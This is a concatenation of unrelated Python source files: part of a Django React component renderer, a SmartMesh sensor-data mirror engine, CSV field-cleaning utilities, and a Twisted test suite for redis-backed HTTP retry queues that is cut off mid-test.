        This is useful if you want to use React as a simple static page generator,
        as stripping away the extra attributes can save lots of bytes.

        Takes the same optional `wrap` argument as `render_to_string`.

        ```
        {{ component.render_to_static_markup }}
        ```
        """
        rendered = render_component(
            path_to_source=self.get_path_to_source(),
            serialized_props=self.get_serialized_props(),
            to_static_markup=True,
        )
        # Same wrapping rule as render_to_string.
        if wrap or wrap is None:
            return self.render_container(
                content=mark_safe(rendered)
            )
        return rendered

    def render_js(self):
        """
        Renders the script elements containing the component's props, source and
        initialisation.

        `render_js` is effectively shorthand for calling each of the component's
        `render_props`, `render_source`, and `render_init` methods.

        ```
        {{ component.render_js }}
        ```
        """
        return render_to_string('django_react/js.html', self.get_render_context(
            rendered_props=self.render_props(),
            rendered_source=self.render_source(),
            rendered_init=self.render_init(),
        ))

    def render_container(self, content=None):
        """
        Renders a HTML element with attributes which Django React uses internally to
        facilitate mounting components with React.

        The rendered element is provided with an id attribute generated by the
        component's `get_container_id` method.

        `render_container` takes an optional argument, `content` which should be a
        string to be inserted within the element.

        ```
        {{ component.render_container }}
        <script>
            console.log(document.getElementById('{{ component.get_container_id }}'));
        </script>
        ```
        """
        return render_to_string('django_react/container.html', self.get_render_context(
            content=content,
            container_id=self.get_container_id(),
            container_class_name=self.get_container_class_name(),
        ))

    def render_props(self):
        """
        Render the component's props as a JavaScript object.

        The props will be defined within the browser's global scope under a
        variable name generated by the component's `get_props_variable` method.

        ```
        {{ component.render_props }}
        <script>
            console.log({{ component.get_props_variable }});
        </script>
        ```
        """
        return render_to_string('django_react/props.html', self.get_render_context(
            props_variable=self.get_props_variable(),
            serialized_props=self.get_serialized_props(),
        ))

    def render_source(self):
        """
        Render a script element pointing to the bundled source of the component.

        The bundled component will be defined within the browser's global scope
        under a variable name generated by the component's `get_variable` method.

        ```
        {{ component.render_source }}
        <script>
            console.log({{ component.get_variable }});
        </script>
        ```
        """
        return render_to_string('django_react/source.html', self.get_render_context(
            source_url=self.get_url_to_source()
        ))

    def render_init(self):
        """
        Render a script element which will create an instance of the component and use
        React to mount it in the container created with the component's `render_container`,
        `render_to_string`, or `render_to_static_markup` methods.

        ```
        {{ component.render_init }}
        ```
        """
        return render_to_string('django_react/init.html', self.get_render_context(
            REACT_EXTERNAL=REACT_EXTERNAL,
            variable=self.get_variable(),
            props_variable=self.get_props_variable(),
            container_id=self.get_container_id(),
        ))

    def get_render_context(self, **kwargs):
        # As a convenience for template overrides, the component instance
        # is passed into the template
        context = {
            'component': self,
        }
        context.update(kwargs)
        return context

    def get_source(self):
        return self.source

    def get_path_to_source(self):
        # Resolved lazily via staticfiles finders and cached.
        if self.path_to_source is None:
            source = self.get_source()
            self.path_to_source = finders.find(source)
        return self.path_to_source

    def get_props(self):
        return self.props

    def get_serialized_props(self):
        if self.serialized_props is None:
            # While rendering templates Django will silently ignore some types of
            # exceptions, so we need to intercept them and raise our own class
            # of exception
            try:
                self.serialized_props = json.dumps(self.get_props())
            except (TypeError, AttributeError) as e:
                six.reraise(PropSerializationError, PropSerializationError(*e.args), sys.exc_info()[2])
        return self.serialized_props

    def get_props_variable(self):
        if self.props_variable is None:
            serialized_props = self.get_serialized_props()
            md5 = hashlib.md5()
            # hashlib requires bytes on Python 3; json.dumps output is
            # ASCII by default, so encoding is a no-op on Python 2.
            md5.update(serialized_props.encode('utf-8'))
            self.props_variable = '__propsFor{variable}_{hash}__'.format(
                variable=self.get_variable(),
                hash=md5.hexdigest(),
            )
        return self.props_variable

    def get_url_to_source(self):
        if self.url_to_source is None:
            bundle = self.bundle(
                entry=self.get_source(),
                library=self.get_variable(),
            )
            # While rendering templates Django will silently ignore some types of
            # exceptions, so we need to intercept them and raise our own class
            # of exception
            try:
                url_to_source = bundle.get_url()
            except (TypeError, AttributeError) as e:
                six.reraise(ComponentBundlingError, ComponentBundlingError(*e.args), sys.exc_info()[2])
            self.url_to_source = url_to_source
        return self.url_to_source

    def get_variable(self):
        # Client-side variable name: the subclass's own name.
        if self.variable is None:
            self.variable = self.__class__.__name__
        return self.variable

    def get_container_id(self):
        # id() keeps container ids unique per component instance.
        return 'reactComponentContainer-{id}'.format(
            id=six.text_type(id(self)),
        )

    def get_container_class_name(self):
        return 'reactComponentContainer reactComponentContainer--{variable}'.format(
            variable=self.get_variable(),
        )
| |
#!/usr/bin/python
import logging
class NullHandler(logging.Handler):
    """Logging handler that silently discards every record."""
    def emit(self, record):
        # Intentionally a no-op.
        pass
# Module logger: errors only, and swallowed by default unless the
# application installs its own handler.
log = logging.getLogger('MirrorEngine')
log.setLevel(logging.ERROR)
log.addHandler(NullHandler())
import re
import threading
import copy
from pydispatch import dispatcher
from SmartMeshSDK.protocols.DC2126AConverters import DC2126AConverters
from EventBus import EventBusClient
class MirrorEngine(EventBusClient.EventBusClient):
    """Maintains a mirror of the latest sensor value per (mac, type).

    Subscribes to the parsed application-data signals, normalizes each
    notification into a {'mac', 'type', 'lastvalue', 'lastupdated'} row,
    keeps only the most recent row per (mac, type) pair, and re-publishes
    every update on the 'newDataMirrored' signal.
    """

    # Extra data signals funneled through the inherited _addToQueue.
    _EXTRA_DATA_SIGNALS = [
        'parsedAppData_DC2126A',
        'parsedAppData_SPIPressure',
        'parsedAppData_GPIONet',
        'parsedAppData_LIS331',
        'parsedAppData_OAPtilt',
    ]

    def __init__(self):
        # log
        log.info('creating instance')
        # initialize parent class; _publish handles the primary signal,
        # _cleanup disconnects the extra signals on teardown
        EventBusClient.EventBusClient.__init__(self,
            signal      = 'parsedAppData_OAPTemperature',
            cb          = self._publish,
            teardown_cb = self._cleanup,
        )
        self.name = 'DataConnector_MirrorEngine'
        # connect extra applications (one loop instead of five copies)
        for extra_signal in self._EXTRA_DATA_SIGNALS:
            dispatcher.connect(
                self._addToQueue,
                signal = extra_signal,
                weak   = False,
            )
        # request/command style signals handled synchronously
        dispatcher.connect(
            self.getMirrorData,
            signal = 'getMirrorData',
            weak   = False,
        )
        dispatcher.connect(
            self.calibrateMirrorData,
            signal = 'calibrateMirrorData',
            weak   = False,
        )
        dispatcher.connect(
            self.clearMirrorData,
            signal = 'clearMirrorData',
            weak   = False,
        )
        # local variables
        self.dataLock          = threading.Lock()   # guards the two fields below
        self.pressureOffsets   = {}                 # mac -> calibration offset
        self.mirrordata        = []                 # latest row per (mac, type)
        self.dc2126Aconverters = DC2126AConverters.DC2126AConverters()

    #======================== public ==========================================

    def getMirrorData(self, sender, signal, data):
        """Return a deep copy of the mirrored rows (pydispatch hands the
        return value back to the sender)."""
        with self.dataLock:
            return copy.deepcopy(self.mirrordata)

    def calibrateMirrorData(self, sender, signal, data):
        """When exactly two pressure sensors are mirrored, record offsets
        that zero out the difference between their current readings."""
        with self.dataLock:
            pressures = {}
            for row in self.mirrordata:
                if row['type']=='pressure':
                    # lastvalue is "<raw>_<offset>"; take the raw part
                    pressures[row['mac']] = int(row['lastvalue'].split('_')[0])
            if len(pressures)==2:
                # list() so indexing also works on Python 3 dict views
                macs = list(pressures.keys())
                offset = pressures[macs[0]]-pressures[macs[1]]
                self.pressureOffsets = {}
                self.pressureOffsets[macs[0]] = -offset
                self.pressureOffsets[macs[1]] = 0

    def clearMirrorData(self, sender, signal, data):
        """Drop every mirrored row."""
        with self.dataLock:
            self.mirrordata = []

    #======================== private =========================================

    def _cleanup(self):
        # disconnect everything wired up in __init__
        for extra_signal in self._EXTRA_DATA_SIGNALS:
            dispatcher.disconnect(
                self._addToQueue,
                signal = extra_signal,
                weak   = False,
            )
        dispatcher.disconnect(
            self.getMirrorData,
            signal = 'getMirrorData',
            weak   = False,
        )
        dispatcher.disconnect(
            self.calibrateMirrorData,
            signal = 'calibrateMirrorData',
            weak   = False,
        )
        dispatcher.disconnect(
            self.clearMirrorData,
            signal = 'clearMirrorData',
            weak   = False,
        )

    def _publish(self, sender, signal, data):
        """Normalize one parsed-data notification into mirror rows, store
        them, and re-dispatch each on 'newDataMirrored'."""
        # format the data to publish
        newData = []
        mac     = data['mac']
        if signal in ['parsedAppData_OAPTemperature']:
            # temperature reported in 1/100th C, displayed in C
            temperature_C = float(data['fields']['temperature'])/100.0
            # format newData entry
            newData += [
                {
                    'mac':            mac,
                    'type':           'temperature',
                    'lastvalue':      str(temperature_C),
                    'lastupdated':    str(data['timestamp']),
                    'subscribeToLed': True,
                }
            ]
        elif signal in ['parsedAppData_DC2126A']:
            # publish temperature
            temperature = self.dc2126Aconverters.convertTemperature(
                data['fields']['temperature'],
            )
            if temperature is not None:
                newData += [
                    {
                        'mac':         mac,
                        'type':        'temperature',
                        'lastvalue':   str(temperature),
                        'lastupdated': str(data['timestamp']),
                    }
                ]
            # publish adcValue
            adcValue = self.dc2126Aconverters.convertAdcValue(
                data['fields']['adcValue'],
            )
            newData += [
                {
                    'mac':         mac,
                    'type':        'voltage',
                    'lastvalue':   adcValue,
                    'lastupdated': str(data['timestamp']),
                }
            ]
            # publish energysource
            energysource = self.dc2126Aconverters.convertEnergySource(
                mac, adcValue,
            )
            newData += [
                {
                    'mac':         mac,
                    'type':        'energysource',
                    'lastvalue':   energysource,
                    'lastupdated': str(data['timestamp']),
                }
            ]
        elif signal in ['parsedAppData_SPIPressure']:
            with self.dataLock:
                # apply the calibration offset recorded for this sensor
                if mac in self.pressureOffsets:
                    offset = self.pressureOffsets[mac]
                else:
                    offset = 0
            # format newData entry
            newData += [
                {
                    'mac':         mac,
                    'type':        'pressure',
                    'lastvalue':   str(data['fields']['adcPressure']) + "_" + str(offset),
                    'lastupdated': str(data['timestamp']),
                }
            ]
        elif signal in ['parsedAppData_GPIONet']:
            # convert 'pinVal' field to meaning
            if   data['fields']['pinVal']==1:
                energysource = 'solar'
            elif data['fields']['pinVal']==2:
                energysource = 'vibration'
            elif data['fields']['pinVal']==3:
                energysource = 'temperature'
            else:
                energysource = 'battery'
            # format newData entry
            newData += [
                {
                    'mac':         mac,
                    'type':        'energysource',
                    'lastvalue':   energysource,
                    'lastupdated': str(data['timestamp']),
                }
            ]
        elif signal in ['parsedAppData_LIS331']:
            # format newData entry
            newData += [
                {
                    'mac':         mac,
                    'type':        'acceleration',
                    'lastvalue':   '{0}_{1}_{2}'.format(
                        data['fields']['x'],
                        data['fields']['y'],
                        data['fields']['z'],
                    ),
                    'lastupdated': str(data['timestamp']),
                }
            ]
        elif signal in ['parsedAppData_OAPtilt']:
            # format newData entry
            newData += [
                {
                    'mac':         mac,
                    'type':        'tilt',
                    'lastvalue':   '{0}'.format(data['fields']['status']),
                    'lastupdated': str(data['timestamp']),
                }
            ]
        else:
            raise SystemError('unexpected signal={0}'.format(signal))
        # store local mirror of data: replace the row for this (mac, type)
        # pair in place, or append when the pair is new
        with self.dataLock:
            for nd in newData:
                found         = False
                newDataSource = nd['mac']
                newDataType   = nd['type']
                for i, e in enumerate(self.mirrordata):
                    if e['mac']==newDataSource and e['type']==newDataType:
                        found = True
                        self.mirrordata[i] = nd
                        break
                if not found:
                    self.mirrordata.append(nd)
        # dispatch (once even if multiple data points)
        with self.dataLock:
            for nd in newData:
                dispatcher.send(
                    signal = 'newDataMirrored',
                    data   = copy.deepcopy(nd),
                )
| |
# coding: utf-8
import csv
import cStringIO
import codecs
import logging
# Module-level logger for the cleaners subsystem.
logger = logging.getLogger("mandoline.cleaners")
class DictUnicodeWriter(object):
    """csv.DictWriter wrapper that writes unicode rows on Python 2.

    Follows the UnicodeWriter recipe from the Python 2 csv docs: rows are
    written UTF-8-encoded into an in-memory queue, decoded back to
    unicode, then re-encoded into the target encoding and written to the
    underlying stream.
    """
    def __init__(self, f, fieldnames, dialect=csv.excel, encoding="utf-8",
                 **kwds):
        # Redirect output to a queue
        self.queue = cStringIO.StringIO()
        self.writer = csv.DictWriter(self.queue, fieldnames, dialect=dialect,
                                     **kwds)
        self.stream = f
        # Incremental encoder for the *target* encoding (see writerow).
        self.encoder = codecs.getincrementalencoder(encoding)()
    def writerow(self, D):
        # The intermediate encoding is deliberately hard-coded UTF-8 (the
        # queue is always UTF-8); `encoding` only affects the final step.
        self.writer.writerow(
            {k: unicode(v).encode("utf-8") for k, v in D.items()})
        # Fetch UTF-8 output from the queue ...
        data = self.queue.getvalue()
        data = data.decode("utf-8")
        # ... and reencode it into the target encoding
        data = self.encoder.encode(data)
        # write to the target stream
        self.stream.write(data)
        # empty queue
        self.queue.truncate(0)
    def writerows(self, rows):
        # Write each dict row in order.
        for D in rows:
            self.writerow(D)
    def writeheader(self):
        # NOTE(review): the header lands in the queue and is only flushed
        # to the stream by the next writerow() — confirm that ordering is
        # acceptable to callers.
        self.writer.writeheader()
class FieldRowCleaner():
    # Marker base class for all field/row cleaners below.  Subclasses
    # implement clean(d, fn) (Rename additionally takes the new name),
    # mutating the row dict ``d`` in place.
    pass
class Rename(FieldRowCleaner):
    """
    Rename a field to a new name
    Rename("a", "b")
    { "a": 1 } => { "b": 1 }
    """
    def __init__(self, from_name, to_name):
        self.from_name = from_name
        self.to_name = to_name
    def clean(self, d, from_name, to_name):
        # pop() removes the old key, matching the documented behaviour
        # ({"a": 1} => {"b": 1}); previously the old key was left behind,
        # producing {"a": 1, "b": 1}.
        d[to_name] = d.pop(from_name)
class CleanWith(FieldRowCleaner):
    """
    Adapter turning a bare cleaning function into a FieldRowCleaner.
    The wrapped callable must have the signature clean(row, fieldname),
    where row is the dict being cleaned and fieldname selects the entry
    to clean; it is expected to update row[fieldname] in place.
    """
    def __init__(self, clean):
        self.clean_func = clean
    def clean(self, d, fn):
        # Delegate straight to the wrapped callable.
        delegate = self.clean_func
        delegate(d, fn)
class Lookup(FieldRowCleaner):
    """
    Map a field's value through a lookup table.
    When ``default`` is None, a value missing from the table is left
    unchanged; otherwise missing values are replaced by ``default``.
    Lookup({1: 2}, 4)
    { "a": 1 } => { "a": 2 }
    { "a": 2 } => { "a": 4 }   # falls back to the default
    """
    def __init__(self, lookup, default=None):
        self.lookup = lookup
        self.default = default
    def clean(self, d, fn):
        current = d[fn]
        # With no default configured, an unknown value maps to itself.
        fallback = current if self.default is None else self.default
        d[fn] = self.lookup.get(current, fallback)
class StateAbbrevLookup(Lookup):
    # Lookup specialised for mapping full US state names (plus DC) to
    # their two-letter USPS abbreviations.  The match is
    # case-insensitive: clean() upper-cases the value before the lookup.
    # NOTE(review): assumes the field value is a string (it calls
    # .upper()); a non-string value would raise AttributeError — confirm
    # upstream always supplies strings.
    def __init__(self, default=None):
        # Intentionally does not call Lookup.__init__: the table is
        # fixed, so only ``default`` is configurable.
        self.default = default
        self.lookup = {
            "DISTRICT OF COLUMBIA": "DC",
            "ALABAMA": "AL",
            "ALASKA": "AK",
            "ARIZONA": "AZ",
            "ARKANSAS": "AR",
            "CALIFORNIA": "CA",
            "COLORADO": "CO",
            "CONNECTICUT": "CT",
            "DELAWARE": "DE",
            "FLORIDA": "FL",
            "GEORGIA": "GA",
            "HAWAII": "HI",
            "IDAHO": "ID",
            "ILLINOIS": "IL",
            "INDIANA": "IN",
            "IOWA": "IA",
            "KANSAS": "KS",
            "KENTUCKY": "KY",
            "LOUISIANA": "LA",
            "MAINE": "ME",
            "MARYLAND": "MD",
            "MASSACHUSETTS": "MA",
            "MICHIGAN": "MI",
            "MINNESOTA": "MN",
            "MISSISSIPPI": "MS",
            "MISSOURI": "MO",
            "MONTANA": "MT",
            "NEBRASKA": "NE",
            "NEVADA": "NV",
            "NEW HAMPSHIRE": "NH",
            "NEW JERSEY": "NJ",
            "NEW MEXICO": "NM",
            "NEW YORK": "NY",
            "NORTH CAROLINA": "NC",
            "NORTH DAKOTA": "ND",
            "OHIO": "OH",
            "OKLAHOMA": "OK",
            "OREGON": "OR",
            "PENNSYLVANIA": "PA",
            "RHODE ISLAND": "RI",
            "SOUTH CAROLINA": "SC",
            "SOUTH DAKOTA": "SD",
            "TENNESSEE": "TN",
            "TEXAS": "TX",
            "UTAH": "UT",
            "VERMONT": "VT",
            "VIRGINIA": "VA",
            "WASHINGTON": "WA",
            "WEST VIRGINIA": "WV",
            "WISCONSIN": "WI",
            "WYOMING": "WY",
        }
    def clean(self, d, fn):
        # Same default semantics as Lookup.clean, but the key is
        # upper-cased first (the unmodified original value is kept when
        # no default is configured and the name is unknown).
        if self.default is None:
            d[fn] = self.lookup.get(d[fn].upper(), d[fn])
        else:
            d[fn] = self.lookup.get(d[fn].upper(), self.default)
class Int(FieldRowCleaner):
    """
    Convert a value to an integer, optionally taking a default value
    Int("a", 0)
    { "a": "1" }    => { "a": 1 }
    { "a": "-3" }   => { "a": -3 }
    { "a": "fred" } => { "a": 0 }
    """
    def __init__(self, default=0):
        self.default = default
    def clean(self, d, fn):
        try:
            # int() (unlike the previous str.isdigit check) also accepts
            # signed values and surrounding whitespace, e.g. "-3", " 42 ".
            d[fn] = int(str(d[fn]))
        except (ValueError, TypeError):
            # Unparsable value: fall back to the default, which must exist.
            assert self.default is not None, "Failed to parse an integer without a default"
            d[fn] = self.default
class Date(FieldRowCleaner):
    """
    Parse a date string into a Unix timestamp in milliseconds
    (local time, via time.mktime).
    Date("%m-%d-%Y")
    { "a": "01-02-2003" } => { "a": <epoch millis> }
    { "a": "garbage" }    => { "a": None }
    """
    def __init__(self, format="%m-%d-%Y"):
        self.format = format
    def clean(self, d, fn):
        from datetime import datetime
        from time import mktime
        try:
            dt = datetime.strptime(d[fn], self.format)
            # multiply by 1000 to convert to ms
            d[fn] = int(mktime(dt.timetuple())) * 1000
        except (ValueError, TypeError, OverflowError):
            # Narrowed from a bare except (which also swallowed
            # KeyboardInterrupt/SystemExit): unparsable or non-string
            # input maps to None instead of aborting the row.
            d[fn] = None
class FieldCleaner():
    """
    Apply a sequence of FieldRowCleaner instances to one field of a row.
    A field name of the form "old=>new" renames the field after the
    other cleaners have run (a Rename is appended to the cleaner list).
    """
    def __init__(self, field_name, *cleaners, **kwargs):
        self.extra_fields_to_save = kwargs.get('extra_fields_to_save')
        self.field_name = field_name
        self.output_name = field_name
        self.cleaners = list(cleaners)
        if '=>' in field_name:
            # "old=>new" syntax: clean under the old name, rename last.
            self.field_name, self.output_name = field_name.split('=>')
            self.cleaners.append(Rename(self.field_name, self.output_name))
    def clean(self, d):
        for cleaner in self.cleaners:
            # Rename takes both the source and the destination name;
            # every other cleaner only takes the field being cleaned.
            args = (d, self.field_name)
            if isinstance(cleaner, Rename):
                args = (d, self.field_name, self.output_name)
            cleaner.clean(*args)
| |
import json
import treq
from twisted.trial.unittest import TestCase
from twisted.internet.defer import inlineCallbacks
from vumi_http_retry.retries import (
pending_key, ready_key, inc_req_count, dec_req_count,
get_req_count, set_req_count, add_pending, pop_pending,
add_ready, pop_pending_add_ready, pop_ready, retry, retry_failed,
can_reattempt)
from vumi_http_retry.tests.utils import ToyServer
from vumi_http_retry.tests.redis import create_client, zitems, lvalues, delete
class TestRetries(TestCase):
    """Integration tests for the redis-backed retry-queue helpers.

    setUp connects a real redis client; tearDown deletes every key
    matching "test.*" and drops the connection.  Pending requests live
    in a sorted set scored by (timestamp + intervals[attempts]); ready
    requests live in a list.
    """
    @inlineCallbacks
    def setUp(self):
        self.redis = yield create_client()
    @inlineCallbacks
    def tearDown(self):
        yield delete(self.redis, "test.*")
        self.redis.transport.loseConnection()
    def redis_spy(self, name):
        # Patch the redis method ``name`` so each call's (args, kwargs)
        # is recorded; returns the (live) list of recorded calls.
        calls = []
        fn = getattr(self.redis, name)
        def wrapper(*a, **kw):
            calls.append((a, kw))
            return fn(*a, **kw)
        self.patch(self.redis, name, wrapper)
        return calls
    @inlineCallbacks
    def test_req_count(self):
        self.assertEqual((yield get_req_count(self.redis, 'test', '1234')), 0)
        yield inc_req_count(self.redis, 'test', '1234')
        self.assertEqual((yield get_req_count(self.redis, 'test', '1234')), 1)
        yield dec_req_count(self.redis, 'test', '1234')
        self.assertEqual((yield get_req_count(self.redis, 'test', '1234')), 0)
        yield set_req_count(self.redis, 'test', '1234', 3)
        self.assertEqual((yield get_req_count(self.redis, 'test', '1234')), 3)
    @inlineCallbacks
    def test_add_pending(self):
        k = pending_key('test')
        self.assertEqual((yield zitems(self.redis, k)), [])
        yield add_pending(self.redis, 'test', {
            'owner_id': '1234',
            'timestamp': 10,
            'intervals': [50, 60],
            'request': {'foo': 23}
        })
        # Score is timestamp + intervals[0]; 'attempts' defaults to 0.
        self.assertEqual((yield zitems(self.redis, k)), [
            (10 + 50, {
                'owner_id': '1234',
                'timestamp': 10,
                'attempts': 0,
                'intervals': [50, 60],
                'request': {'foo': 23},
            }),
        ])
        yield add_pending(self.redis, 'test', {
            'owner_id': '1234',
            'timestamp': 5,
            'intervals': [20, 90],
            'request': {'bar': 42}
        })
        self.assertEqual((yield zitems(self.redis, k)), [
            (5 + 20, {
                'owner_id': '1234',
                'timestamp': 5,
                'attempts': 0,
                'intervals': [20, 90],
                'request': {'bar': 42},
            }),
            (10 + 50, {
                'owner_id': '1234',
                'timestamp': 10,
                'attempts': 0,
                'intervals': [50, 60],
                'request': {'foo': 23},
            }),
        ])
    @inlineCallbacks
    def test_add_pending_next_retry(self):
        # With 'attempts' set, the score uses intervals[attempts].
        k = pending_key('test')
        self.assertEqual((yield zitems(self.redis, k)), [])
        yield add_pending(self.redis, 'test', {
            'owner_id': '1234',
            'timestamp': 10,
            'attempts': 1,
            'intervals': [50, 60],
            'request': {'foo': 23}
        })
        self.assertEqual((yield zitems(self.redis, k)), [
            (10 + 60, {
                'owner_id': '1234',
                'timestamp': 10,
                'attempts': 1,
                'intervals': [50, 60],
                'request': {'foo': 23},
            }),
        ])
        yield add_pending(self.redis, 'test', {
            'owner_id': '1234',
            'timestamp': 5,
            'attempts': 2,
            'intervals': [20, 90, 100],
            'request': {'bar': 42}
        })
        self.assertEqual((yield zitems(self.redis, k)), [
            (10 + 60, {
                'owner_id': '1234',
                'timestamp': 10,
                'attempts': 1,
                'intervals': [50, 60],
                'request': {'foo': 23},
            }),
            (5 + 100, {
                'owner_id': '1234',
                'timestamp': 5,
                'attempts': 2,
                'intervals': [20, 90, 100],
                'request': {'bar': 42},
            }),
        ])
    @inlineCallbacks
    def test_pop_pending(self):
        k = pending_key('test')
        # Six items with timestamps 5..30 and interval 10 => scores 15..40.
        for t in range(5, 35, 5):
            yield add_pending(self.redis, 'test', {
                'owner_id': '1234',
                'timestamp': t,
                'attempts': 0,
                'intervals': [10],
                'request': {'foo': t}
            })
        pending = yield zitems(self.redis, k)
        pending_reqs = [r for t, r in pending]
        result = yield pop_pending(self.redis, 'test', 0, 10 + 13)
        self.assertEqual(result, pending_reqs[:2])
        self.assertEqual((yield zitems(self.redis, k)), pending[2:])
        result = yield pop_pending(self.redis, 'test', 10 + 18, 10 + 27)
        self.assertEqual(result, pending_reqs[3:5])
        self.assertEqual(
            (yield zitems(self.redis, k)),
            pending[2:3] + pending[5:])
        result = yield pop_pending(self.redis, 'test', 0, 50)
        self.assertEqual(result, pending_reqs[2:3] + pending_reqs[5:])
        self.assertEqual((yield zitems(self.redis, k)), [])
    @inlineCallbacks
    def test_pop_pending_limit(self):
        k = pending_key('test')
        for t in range(5, 40, 5):
            yield add_pending(self.redis, 'test', {
                'owner_id': '1234',
                'timestamp': t,
                'attempts': 0,
                'intervals': [10],
                'request': {'foo': t}
            })
        pending = yield zitems(self.redis, k)
        pending_reqs = [r for t, r in pending]
        result = yield pop_pending(self.redis, 'test', 0, 50, limit=2)
        self.assertEqual(result, pending_reqs[:2])
        self.assertEqual((yield zitems(self.redis, k)), pending[2:])
        result = yield pop_pending(self.redis, 'test', 0, 50, limit=3)
        self.assertEqual(result, pending_reqs[2:5])
        self.assertEqual((yield zitems(self.redis, k)), pending[5:])
        result = yield pop_pending(self.redis, 'test', 0, 50, limit=3)
        self.assertEqual(result, pending_reqs[5:])
        self.assertEqual((yield zitems(self.redis, k)), [])
        # Popping from an empty set yields an empty result, not an error.
        result = yield pop_pending(self.redis, 'test', 0, 50, limit=3)
        self.assertEqual(result, [])
        self.assertEqual((yield zitems(self.redis, k)), [])
    @inlineCallbacks
    def test_pop_pending_no_deserialize(self):
        # deserialize=False returns raw JSON strings instead of dicts.
        k = pending_key('test')
        for t in range(5, 35, 5):
            yield add_pending(self.redis, 'test', {
                'owner_id': '1234',
                'timestamp': t,
                'attempts': 0,
                'intervals': [10],
                'request': {'foo': t}
            })
        pending = yield zitems(self.redis, k)
        pending_reqs = [r for t, r in pending]
        result = yield pop_pending(
            self.redis, 'test', 0, 10 + 13, deserialize=False)
        self.assertEqual([json.loads(r) for r in result], pending_reqs[:2])
    @inlineCallbacks
    def test_add_ready(self):
        k = ready_key('test')
        req1 = {
            'owner_id': '1234',
            'timestamp': 5,
            'attempts': 0,
            'intervals': [10],
            'request': {'foo': 23}
        }
        req2 = {
            'owner_id': '1234',
            'timestamp': 10,
            'attempts': 0,
            'intervals': [10],
            'request': {'bar': 42}
        }
        req3 = {
            'owner_id': '1234',
            'timestamp': 15,
            'attempts': 0,
            'intervals': [10],
            'request': {'baz': 21}
        }
        self.assertEqual((yield lvalues(self.redis, k)), [])
        # Adding an empty batch is a no-op.
        yield add_ready(self.redis, 'test', [])
        self.assertEqual((yield lvalues(self.redis, k)), [])
        yield add_ready(self.redis, 'test', [req1])
        self.assertEqual((yield lvalues(self.redis, k)), [req1])
        yield add_ready(self.redis, 'test', [req2, req3])
        self.assertEqual((yield lvalues(self.redis, k)), [req1, req2, req3])
    @inlineCallbacks
    def test_add_ready_no_serialize(self):
        # serialize=False accepts pre-serialized JSON strings.
        k = ready_key('test')
        req1 = {
            'owner_id': '1234',
            'timestamp': 5,
            'attempts': 0,
            'intervals': [10],
            'request': {'foo': 23}
        }
        req2 = {
            'owner_id': '1234',
            'timestamp': 10,
            'attempts': 0,
            'intervals': [10],
            'request': {'bar': 42}
        }
        yield add_ready(
            self.redis, 'test', [json.dumps(req1), json.dumps(req2)],
            serialize=False)
        self.assertEqual((yield lvalues(self.redis, k)), [req1, req2])
    @inlineCallbacks
    def test_pop_pending_add_ready(self):
        # Requests popped from the pending zset land on the ready list.
        k_p = pending_key('test')
        k_r = ready_key('test')
        for t in range(5, 40, 5):
            yield add_pending(self.redis, 'test', {
                'owner_id': '1234',
                'timestamp': t,
                'attempts': 0,
                'intervals': [10],
                'request': {'foo': t}
            })
        pending_reqs = [r for t, r in (yield zitems(self.redis, k_p))]
        yield pop_pending_add_ready(self.redis, 'test', 0, 50)
        self.assertEqual((yield lvalues(self.redis, k_r)), pending_reqs)
        self.assertEqual((yield zitems(self.redis, k_p)), [])
    @inlineCallbacks
    def test_pop_pending_add_ready_chunks(self):
        # 7 items with chunk_size=3 => 4 identical zrangebyscore pages
        # (3 + 3 + 1 items, plus a final empty page).
        calls = self.redis_spy('zrangebyscore')
        k = pending_key('test')
        for t in range(5, 40, 5):
            yield add_pending(self.redis, 'test', {
                'owner_id': '1234',
                'timestamp': t,
                'attempts': 0,
                'intervals': [10],
                'request': {'foo': t}
            })
        yield pop_pending_add_ready(
            self.redis, 'test', 0, 50, chunk_size=3)
        self.assertEqual(calls, 4 * [
            ((k, 0, 50), {
                'offset': 0,
                'count': 3
            }),
        ])
    @inlineCallbacks
    def test_pop_pending_add_ready_chunks_tap(self):
        # ``tap`` is invoked once per chunk with the raw popped values.
        k_p = pending_key('test')
        taps = []
        for t in range(5, 40, 5):
            yield add_pending(self.redis, 'test', {
                'owner_id': '1234',
                'timestamp': t,
                'attempts': 0,
                'intervals': [10],
                'request': {'foo': t}
            })
        pending_reqs = yield self.redis.zrange(k_p, 0, -1)
        yield pop_pending_add_ready(
            self.redis, 'test', 0, 50, chunk_size=3, tap=taps.append)
        self.assertEqual(taps, [
            pending_reqs[:3],
            pending_reqs[3:6],
            pending_reqs[6:],
        ])
    @inlineCallbacks
    def test_pop_ready(self):
        # pop_ready is FIFO and returns None once the list is empty.
        k = ready_key('test')
        req1 = {
            'owner_id': '1234',
            'timestamp': 5,
            'attempts': 0,
            'intervals': [10],
            'request': {'foo': 23}
        }
        req2 = {
            'owner_id': '1234',
            'timestamp': 10,
            'attempts': 0,
            'intervals': [10],
            'request': {'bar': 42}
        }
        yield add_ready(self.redis, 'test', [req1, req2])
        self.assertEqual((yield lvalues(self.redis, k)), [req1, req2])
        result = yield pop_ready(self.redis, 'test')
        self.assertEqual(result, req1)
        self.assertEqual((yield lvalues(self.redis, k)), [req2])
        result = yield pop_ready(self.redis, 'test')
        self.assertEqual(result, req2)
        self.assertEqual((yield lvalues(self.redis, k)), [])
        result = yield pop_ready(self.redis, 'test')
        self.assertEqual(result, None)
        self.assertEqual((yield lvalues(self.redis, k)), [])
    @inlineCallbacks
    def test_retry(self):
        srv = yield ToyServer.from_test(self)
        reqs = []
        @srv.app.route('/foo')
        def route(req):
            reqs.append(req)
            return 'ok'
        resp = yield retry({
            'owner_id': '1234',
            'timestamp': 5,
            'attempts': 0,
            'intervals': [10],
            'request': {
                'url': "%s/foo" % (srv.url,),
                'method': 'POST'
            }
        }, persistent=False)
        self.assertEqual(resp.code, 200)
        self.assertEqual((yield resp.content()), 'ok')
        [req] = reqs
        self.assertEqual(req.method, 'POST')
    @inlineCallbacks
    def test_retry_data(self):
        srv = yield ToyServer.from_test(self)
        contents = []
        @srv.app.route('/foo')
        def route(req):
            contents.append(req.content.read())
        yield retry({
            'owner_id': '1234',
            'timestamp': 5,
            'attempts': 0,
            'intervals': [10],
            'request': {
                'url': "%s/foo" % (srv.url,),
                'method': 'POST',
                'body': 'hi'
            }
        }, persistent=False)
        self.assertEqual(contents, ['hi'])
    @inlineCallbacks
    def test_retry_headers(self):
        srv = yield ToyServer.from_test(self)
        headers = []
        @srv.app.route('/foo')
        def route(req):
            headers.append({
                'X-Foo': req.requestHeaders.getRawHeaders('X-Foo'),
                'X-Bar': req.requestHeaders.getRawHeaders('X-Bar')
            })
        yield retry({
